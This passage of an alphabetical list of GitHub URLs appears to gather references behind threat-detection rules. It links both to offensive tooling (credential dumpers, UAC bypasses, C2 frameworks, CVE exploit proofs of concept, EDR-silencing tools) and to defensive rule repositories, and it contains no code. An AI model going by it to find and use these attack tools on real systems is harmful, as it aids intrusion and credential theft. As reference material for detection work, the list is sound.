nhttps://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py\nhttps://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\nhttps://github.com/dagwieers/vsftpd/\nhttps://github.com/danielbohannon/Invoke-DOSfuscation\nhttps://github.com/danielbohannon/Invoke-Obfuscation\nhttps://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nhttps://github.com/DarkCoderSc/PowerRunAsSystem/\nhttps://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter\nhttps://github.com/darrenmartyn/VisualDoor\nhttps://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp\nhttps://github.com/Dec0ne/KrbRelayUp\nhttps://github.com/decoder-it/LocalPotato\nhttps://github.com/deepinstinct/Lsass-Shtinkering\nhttps://github.com/deepinstinct/NoFilter\nhttps://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp\nhttps://github.com/defaultnamehere/cookie_crimes/\nhttps://github.com/denandz/KeeFarce\nhttps://github.com/diego-treitos/linux-smart-enumeration\nhttps://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp\nhttps://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code\nhttps://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39\nhttps://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables\nhttps://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38\nhttps://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_\nhttps://github.com/dsnezhkov/TruffleSnout\nhttps://github.com/dsnezhkov/TruffleSnout/blob/7c2f22e246ef704bc96c396f66fa854e9ca742b9/TruffleSnout/Docs/USAGE.md\nhttps://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md\nhttps://github.com/EddieIvan01/iox\nhttps://github.com/ehang-io/nps\nhttps://github.com/Ekultek/BlueKeep\nhttps://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml\nhttps://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml\nhttps://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml\nhttps://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml\nhttps://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml\nhttps://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml\nhttps://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml\nhttps://github.com/elastic/detection-rules/blob/5fe7833312031a4787e07893e27e4ea7a7665745/rules/_deprecated/privilege_escalation_krbrelayup_suspicious_logon.toml#L38\nhttps://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml\nhttps://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml\nhttps://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml\nhttps://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml\nhttps://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\nhttps://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml\nhttps://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml\nhttps://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml\nhttps://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/initial_access_via_system_manager.toml\nhttps://github.com/elastic/detection-rules/blob/v8.6.0/rules/integrations/aws/initial_access_via_system_manager.toml\nhttps://github.com/elastic/detection-rules/issues/1371\nhttps://github.com/elastic/detection-rules/pull/1145/files\nhttps://github.com/elastic/detection-rules/pull/1213\nhttps://github.com/elastic/detection-rules/pull/1214\nhttps://github.com/elastic/detection-rules/pull/1267\nhttps://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2\nhttps://github.com/elddy/NimScan\nhttps://github.com/electron/rcedit\nhttps://github.com/embedi/CVE-2017-11882\nhttps://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Install-SSP.ps1#L157\nhttps://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545\nhttps://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py\nhttps://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py\nhttps://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165\nhttps://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1\nhttps://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64\nhttps://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64\nhttps://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191\nhttps://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178\nhttps://github.com/EmpireProject/PSInject\nhttps://github.com/eset/malware-ioc/tree/master/oceanlotus\nhttps://github.com/FalconForceTeam/FalconFriday/blob/a9219dfcfd89836f34660223f47d766982bdce46/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md\nhttps://github.com/FalconForceTeam/FalconFriday/blob/master/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md\nhttps://github.com/FalconForceTeam/SOAPHound\nhttps://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb\nhttps://github.com/fatedier/frp\nhttps://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450\nhttps://github.com/fireeye/DueDLLigence\nhttps://github.com/FireFart/hivenightmare\nhttps://github.com/FireFart/hivenightmare/\nhttps://github.com/ForceFledgling/CVE-2023-22518\nhttps://github.com/forgottentq/powershell/blob/9e616363d497143dc955c4fdce68e5c18d28a6cb/captureWindows-Endpoint.ps1#L13\nhttps://github.com/fortra/impacket\nhttps://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296\nhttps://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60\nhttps://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py\nhttps://github.com/fortra/nanodump\nhttps://github.com/FortyNorthSecurity/WMImplant\nhttps://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427\nhttps://github.com/fox-it/LDAPFragger\nhttps://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry\nhttps://github.com/frgnca/AudioDeviceCmdlets\nhttps://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12\nhttps://github.com/gabe-k/themebleed\nhttps://github.com/gentilkiwi/mimikatz\nhttps://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760\nhttps://github.com/Gerenios/AADInternals\nhttps://github.com/GhostPack/Certify\nhttps://github.com/GhostPack/KeeThief\nhttps://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12\nhttps://github.com/GhostPack/Rubeus\nhttps://github.com/GhostPack/SafetyKatz\nhttps://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63\nhttps://github.com/GhostPack/Seatbelt\nhttps://github.com/GhostPack/SharpDPAPI\nhttps://github.com/GhostPack/SharpUp\nhttps://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283\nhttps://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat\nhttps://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1\nhttps://github.com/GossiTheDog/HiveNightmare\nhttps://github.com/GossiTheDog/SystemNightmare\nhttps://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab\nhttps://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c\nhttps://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308\nhttps://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1\nhttps://github.com/gtworek/PSBits/tree/master/IFilter\nhttps://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\nhttps://github.com/gtworek/PSBits/tree/master/SIP\nhttps://github.com/Gui774ume/ebpfkit\nhttps://github.com/h3v0x/CVE-2021-26084_Confluence\nhttps://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh\nhttps://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh\nhttps://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275\nhttps://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33\nhttps://github.com/hackerhouse-opensource/iscsicpl_bypassUAC\nhttps://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)\nhttps://github.com/Hackndo/lsassy\nhttps://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py\nhttps://github.com/Hackplayers/evil-winrm\nhttps://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb\nhttps://github.com/hacksysteam/HackSysExtremeVulnerableDriver\nhttps://github.com/hackvens/CoercedPotato\nhttps://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md\nhttps://github.com/harleyQu1nn/AggressorScripts\nhttps://github.com/HarmJ0y/DAMP\nhttps://github.com/HavocFramework/Havoc\nhttps://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py\nhttps://github.com/helpsystems/nanodump\nhttps://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507\nhttps://github.com/hfiref0x/UACME\nhttps://github.com/hhlxf/PrintNightmare\nhttps://github.com/hieuminhnv/CVE-2022-21587-POC\nhttps://github.com/HiwinCN/HTran\nhttps://github.com/hlldz/Invoke-Phant0m\nhttps://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1\nhttps://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py\nhttps://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py\nhttps://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md\nhttps://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\nhttps://github.com/huntresslabs/threat-intel/blob/3bad6b0fadfcca3ff5680923e74e39edd72f32da/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml\nhttps://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml\nhttps://github.com/HuskyHacks/ShadowSteal\nhttps://github.com/HyperSine/how-does-MobaXterm-encrypt-password\nhttps://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events\nhttps://github.com/iagox86/dnscat2\nhttps://github.com/Immersive-Labs-Sec/nimbuspwn\nhttps://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363\nhttps://github.com/joaoviictorti/RustRedOps/tree/ce04369a246006d399e8c61d9fe0e6b34f988a49/Self_Deletion\nhttps://github.com/JoelGMSec/PSAsyncShell\nhttps://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951\nhttps://github.com/jpillora/chisel/\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md\nhttps://github.com/JumpsecLabs/TokenSmith\nhttps://github.com/kagancapar/CVE-2022-29072\nhttps://github.com/kavika13/RemCom\nhttps://github.com/kavika13/RemCom/\nhttps://github.com/Kevin-Robertson/Inveigh\nhttps://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs\nhttps://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs\nhttps://github.com/Kevin-Robertson/Powermad\nhttps://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection\nhttps://github.com/kleiton0x00/RedditC2\nhttps://github.com/klinix5/InstallerFileTakeOver\nhttps://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf\nhttps://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet\nhttps://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md\nhttps://github.com/krmaxwell/dns-exfiltration\nhttps://github.com/LandGrey/CVE-2018-2894\nhttps://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92\nhttps://github.com/last-byte/PersistenceSniper\nhttps://github.com/lclevy/firepwd\nhttps://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md\nhttps://github.com/lijiejie/IIS_shortname_Scanner\nhttps://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680\nhttps://github.com/logangoins/SharpSuccessor\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Esentutl.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/issues/243\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/147\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/151\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/180\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/211/files\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/238/files\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/239\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/239/files\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/264\nhttps://github.com/looCiprian/GC2-sheet\nhttps://github.com/ly4k/Certipy\nhttps://github.com/ly4k/SpoolFool\nhttps://github.com/M2Team/Privexec/\nhttps://github.com/Maka8ka/NGLite\nhttps://github.com/malcomvetter/CSExec\nhttps://github.com/mandiant/SharPersist\nhttps://github.com/matterpreter/DefenderCheck\nhttps://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt\nhttps://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH\nhttps://github.com/mdsecactivebreach/CACTUSTORCH\nhttps://github.com/med0x2e/vba2clr\nhttps://github.com/mgeeky/Stracciatella\nhttps://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.Common/Data/DPAPI/DPAPIBackupKey.cs#L28-L32\nhttps://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1\nhttps://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md\nhttps://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md\nhttps://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md\nhttps://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml\nhttps://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs\nhttps://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13\nhttps://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log\nhttps://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad\nhttps://github.com/mitre-attack/bzar#indicators-for-attck-execution\nhttps://github.com/mitre-attack/bzar#indicators-for-attck-persistence\nhttps://github.com/mttaggart/OffensiveNotion\nhttps://github.com/mttaggart/quasar\nhttps://github.com/murataydemir/CVE-2021-27905\nhttps://github.com/mvelazc0/PurpleSharp\nhttps://github.com/MythicAgents/typhon/\nhttps://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv\nhttps://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv\nhttps://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml\nhttps://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1803/W10_1803_Pro_19700101_17134.1/WEPExplorer/Application%20Popup.xml#L36\nhttps://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml\nhttps://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/Microsoft-Windows-MsiServer.xml\nhttps://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md\nhttps://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md\nhttps://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md\nhttps://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nhttps://github.com/nathan31337/Splunk-RCE-poc/\nhttps://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py\nhttps://github.com/Ne0nd0g/merlin\nhttps://github.com/Neo23x0/auditd\nhttps://github.com/Neo23x0/auditd/blob/master/audit.rules\nhttps://github.com/Neo23x0/DLLRunner\nhttps://github.com/Neo23x0/Raccine\nhttps://github.com/Neo23x0/Raccine#the-process\nhttps://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar\nhttps://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar\nhttps://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19\nhttps://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326\nhttps://github.com/netero1010/EDRSilencer\nhttps://github.com/netero1010/TrustedPath-UACBypass-BOF\nhttps://github.com/NetSPI/aws_consoler\nhttps://github.com/NetSPI/PowerUpSQL\nhttps://github.com/nettitude/Invoke-PowerThIEf\nhttps://github.com/nettitude/SharpWSUS\nhttps://github.com/nknorg/nkn-sdk-go\nhttps://github.com/nsacyber/Event-Forwarding-Guidance/tree/6e92d622fa33da911f79e7633da4263d632f9624/Events\nhttps://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js\nhttps://github.com/ohpe/juicy-potato\nhttps://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md\nhttps://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml\nhttps://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c\nhttps://github.com/ORCx41/DeleteShadowCopies\nhttps://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml\nhttps://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml\nhttps://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml\nhttps://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml\nhttps://github.com/OTRF/detection-hackathon-apt29\nhttps://github.com/OTRF/detection-hackathon-apt29/issues/1\nhttps://github.com/OTRF/detection-hackathon-apt29/issues/12\nhttps://github.com/OTRF/detection-hackathon-apt29/issues/14\nhttps://github.com/OTRF/detection-hackathon-apt29/issues/16\nhttps://github.com